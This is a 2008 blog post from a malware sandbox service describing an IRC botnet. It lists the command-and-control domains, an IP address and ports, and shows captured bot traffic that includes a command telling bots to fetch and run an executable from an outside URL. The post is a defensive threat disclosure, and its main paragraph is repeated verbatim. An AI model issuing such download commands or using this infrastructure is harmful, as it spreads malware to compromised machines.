Annoying Botnets
Saturday, May 31. 2008
At cwsandbox.org, we receive quite a few binaries these days. However, we receive also lots of "uninteresting" files like hundreds of copies of Allaple, which we basically filter out in an automated way.
A specific annoying family of malware sample we receive a lot are all the bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of sample of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider did not yet react to abuse complaints, thus I publish a few more details about this botnet - perhaps someone else can help. The botnet related to the first domains has the Command & Control server listening on TCP port 65520, while the second botnet has the C&C server at TCP port 80. An example communication of the bots looks like:
A specific annoying family of malware sample we receive a lot are all the bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of sample of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider did not yet react to abuse complaints, thus I publish a few more details about this botnet - perhaps someone else can help. The botnet related to the first domains has the Command & Control server listening on TCP port 65520, while the second botnet has the C&C server at TCP port 80. An example communication of the bots looks like:
NICK rzyaaqgs
USER f020501 . . :-Service Pack 2
JOIN &virtu
:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe
".
